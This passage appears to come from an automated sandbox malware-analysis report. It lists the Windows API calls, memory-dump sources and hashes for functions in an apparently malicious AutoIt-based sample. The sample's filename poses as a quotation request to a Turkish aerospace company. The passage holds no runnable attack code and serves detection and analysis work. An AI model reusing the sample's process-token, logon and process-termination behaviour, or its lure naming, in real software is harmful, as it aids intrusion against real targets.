                                                                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 01002355
                                                                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01002386
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3311875123-0
                                                                                                                                    • Opcode ID: bb6600a99827a38fbe9f0c609beb68b9c8f99dc0b1f96dae2dafa52c0f455812
                                                                                                                                    • Instruction ID: 4dc2cd5bda5e28807e97de620888332255cf58a7cc0fd82af3f416b1c5ea58f1
                                                                                                                                    • Opcode Fuzzy Hash: bb6600a99827a38fbe9f0c609beb68b9c8f99dc0b1f96dae2dafa52c0f455812
                                                                                                                                    • Instruction Fuzzy Hash: B751AF7060020AEBEF22CF68C98CBADBBF5BF45314F148199E995A72D0D7719A44CB51
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00FA179A
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FA17FE
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FA181B
                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FA182C
                                                                                                                                    • EndPaint.USER32(?,?), ref: 00FA1876
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1827037458-0
                                                                                                                                    • Opcode ID: 794a652c1be4eed9cac80c5b53a398f3ef37c4e389cfc5193763259cf423001a
                                                                                                                                    • Instruction ID: bd06df03ad9cf034f39e0041626ebb03ccd7d32214b402324ea3705535a54606
                                                                                                                                    • Opcode Fuzzy Hash: 794a652c1be4eed9cac80c5b53a398f3ef37c4e389cfc5193763259cf423001a
                                                                                                                                    • Instruction Fuzzy Hash: 7D41C1715043019FC720DF24CC84FBA7BF8FB4A764F180629F9A4872A1C7399805EB61
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(010657B0,00000000,011F5D60,?,?,010657B0,?,0102B5A8,?,?), ref: 0102B712
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0102B736
                                                                                                                                    • ShowWindow.USER32(010657B0,00000000,011F5D60,?,?,010657B0,?,0102B5A8,?,?), ref: 0102B796
                                                                                                                                    • ShowWindow.USER32(00000000,00000004,?,0102B5A8,?,?), ref: 0102B7A8
                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0102B7CC
                                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0102B7EF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                    • Opcode ID: 95555a5a9efc835106de393f430c87748b130c29fc45457202f527326cb95fbe
                                                                                                                                    • Instruction ID: 9b73f1eebfcba89b60b9f78737948f5b889fbb004f8dc973f2bb7ebdc31a214d
                                                                                                                                    • Opcode Fuzzy Hash: 95555a5a9efc835106de393f430c87748b130c29fc45457202f527326cb95fbe
                                                                                                                                    • Instruction Fuzzy Hash: 33414D34600251AFEB66CF28C499B957FE1FF09350F1C41E9EAC88F6A2C732A456DB51
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,01014E41,?,?,00000000,00000001), ref: 010170AC
                                                                                                                                      • Part of subcall function 010139A0: GetWindowRect.USER32(?,?), ref: 010139B3
                                                                                                                                    • GetDesktopWindow.USER32 ref: 010170D6
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 010170DD
                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0101710F
                                                                                                                                      • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                                                                                    • GetCursorPos.USER32(?), ref: 0101713B
                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01017199
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4137160315-0
                                                                                                                                    • Opcode ID: e16013cae6069d576a07c69fee24e3673d641b8acdcdb44ce3409e324d66c642
                                                                                                                                    • Instruction ID: 1888481d57e5138fbc74211255dcb0563f793fced078e0d644b18e1b5405e671
                                                                                                                                    • Opcode Fuzzy Hash: e16013cae6069d576a07c69fee24e3673d641b8acdcdb44ce3409e324d66c642
                                                                                                                                    • Instruction Fuzzy Hash: 1131B072505316ABD730DF18C848F9BBBEAFF88354F100919F5C597181CA79EA09CB92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FF80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FF80C0
                                                                                                                                      • Part of subcall function 00FF80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FF80CA
                                                                                                                                      • Part of subcall function 00FF80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FF80D9
                                                                                                                                      • Part of subcall function 00FF80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FF80E0
                                                                                                                                      • Part of subcall function 00FF80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FF80F6
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00FF842F), ref: 00FF88CA
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FF88D6
                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00FF88DD
                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FF88F6
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00FF842F), ref: 00FF890A
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FF8911
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                    • Opcode ID: b90454d8b28ffd421c8faf405c634680127f5ac2c31fb4ef693e7385a11f7fce
                                                                                                                                    • Instruction ID: 3e7e1e884d5ba6b9d2b39a2f3e5f6e277a0c203ad6e8e5b40aef79066b1a751f
                                                                                                                                    • Opcode Fuzzy Hash: b90454d8b28ffd421c8faf405c634680127f5ac2c31fb4ef693e7385a11f7fce
                                                                                                                                    • Instruction Fuzzy Hash: CD11A231901209FFDB309FA4DC0ABBE7B78EF457A1F604018E98597210CB769901EB60
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FF85E2
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00FF85E9
                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FF85F8
                                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00FF8603
                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FF8632
                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FF8646
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                    • Opcode ID: 0885bbbee9b3f22e1265910e694688765747b4d921b0119ad2bb1768b551a65a
                                                                                                                                    • Instruction ID: 1bca48068c8acd8246d98ca295b13a60b1801450f311f5be292fe41d5d36a248
                                                                                                                                    • Opcode Fuzzy Hash: 0885bbbee9b3f22e1265910e694688765747b4d921b0119ad2bb1768b551a65a
                                                                                                                                    • Instruction Fuzzy Hash: 0F11597250024EABDF218EA4DD49FEE7BB9EF08794F184055FE05E2160C7768D61EB60
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 00FFB7B5
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FFB7C6
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FFB7CD
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00FFB7D5
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FFB7EC
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00FFB7FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                    • Opcode ID: 47a237ed46cb191c96f9c73eb2b3276d3f425f45cf5c5959b1d89ffb8c46d0db
                                                                                                                                    • Instruction ID: e228ca047a89fa307a799a8bddaa7445c89593c26b1f5f493b2cae0d9e27ca00
                                                                                                                                    • Opcode Fuzzy Hash: 47a237ed46cb191c96f9c73eb2b3276d3f425f45cf5c5959b1d89ffb8c46d0db
                                                                                                                                    • Instruction Fuzzy Hash: B2017175E00209BBEB20AFB69D49A5ABFB8EF48361F104065FA04A7291D6359C00CF90
                                                                                                                                    APIs
                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FC0193
                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FC019B
                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FC01A6
                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FC01B1
                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FC01B9
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FC01C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                    • Opcode ID: 708bfeaebe1d1ffc257d07613c75286e03c050181c5a4d7259cd2fad441ee9b5
                                                                                                                                    • Instruction ID: 57e22c956061d07f80c418e64a8e773f935cfcc353254db86e6c6b6c55b79677
                                                                                                                                    • Opcode Fuzzy Hash: 708bfeaebe1d1ffc257d07613c75286e03c050181c5a4d7259cd2fad441ee9b5
                                                                                                                                    • Instruction Fuzzy Hash: E90148B090275A7DE3108F6A8C85A52FEA8FF19394F00411BA15847941C7B5A868CBE5
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010053F9
                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0100540F
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0100541E
                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100542D
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01005437
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100543E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                    • Opcode ID: 1159ea1bdc14368a5da6ee717ebde71af6b96b62d4d2808a0c2d6825920a2302
                                                                                                                                    • Instruction ID: 292ed7cb422bd956d4e581eae71df40da1f8486edaa14c60ded6d4c1977e6565
                                                                                                                                    • Opcode Fuzzy Hash: 1159ea1bdc14368a5da6ee717ebde71af6b96b62d4d2808a0c2d6825920a2302
                                                                                                                                    • Instruction Fuzzy Hash: B9F06D32240159BBE7315EA29C0EEEB7A7CEBCAB51F100159FA44D1081DAAA1A0187B5
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 01007243
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00FB0EE4,?,?), ref: 01007254
                                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00FB0EE4,?,?), ref: 01007261
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FB0EE4,?,?), ref: 0100726E
                                                                                                                                      • Part of subcall function 01006C35: CloseHandle.KERNEL32(00000000,?,0100727B,?,00FB0EE4,?,?), ref: 01006C3F
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 01007281
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00FB0EE4,?,?), ref: 01007288
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                    • Opcode ID: e816db8170c35e4fae9d309af9e8c2daddc841bd4bed9cd76b9853921df3a51f
                                                                                                                                    • Instruction ID: 2f01443e139eb11c335f00e6fcd91c2b07385498c8101699587fe8e1ee24ce96
                                                                                                                                    • Opcode Fuzzy Hash: e816db8170c35e4fae9d309af9e8c2daddc841bd4bed9cd76b9853921df3a51f
                                                                                                                                    • Instruction Fuzzy Hash: 9AF09A36441213ABE7722F24EE4C9EA7B3AEF07342F200121F28290098CB7B1404CB50
                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FF899D
                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00FF89A9
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FF89B2
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FF89BA
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF89C3
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FF89CA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                    • Opcode ID: 4a0339f0c44bac58b0506a50babd2375ec10fe801747be7a82df39684bf9b689
                                                                                                                                    • Instruction ID: 2e6ba555572b31135730851b36a46976c0084085315d072ab6684b7c2a9985a1
                                                                                                                                    • Opcode Fuzzy Hash: 4a0339f0c44bac58b0506a50babd2375ec10fe801747be7a82df39684bf9b689
                                                                                                                                    • Instruction Fuzzy Hash: 6CE0C936004002BBD6212FE1ED0C915BB79FB893A27B08220F255C1068CB375420DB50
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 01018613
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 01018722
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0101889A
                                                                                                                                      • Part of subcall function 01007562: VariantInit.OLEAUT32(00000000), ref: 010075A2
                                                                                                                                      • Part of subcall function 01007562: VariantCopy.OLEAUT32(00000000,?), ref: 010075AB
                                                                                                                                      • Part of subcall function 01007562: VariantClear.OLEAUT32(00000000), ref: 010075B7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                                    • Opcode ID: ee13d1b14200b203fce039a17e4ea4eb856bb93079c6dc6ec3bb3b925cbd404c
                                                                                                                                    • Instruction ID: 24d72ea266a33fca6477071b0c6e46e5bab84c2869f27ccec5b478ee3abd7f84
                                                                                                                                    • Opcode Fuzzy Hash: ee13d1b14200b203fce039a17e4ea4eb856bb93079c6dc6ec3bb3b925cbd404c
                                                                                                                                    • Instruction Fuzzy Hash: 59916D716083019FC710DF24C88495BBBF4EF89754F04896EF99A8B365DB39EA05CB92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                                                                                    • _memset.LIBCMT ref: 01002B87
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01002BB6
                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01002C69
                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01002C97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
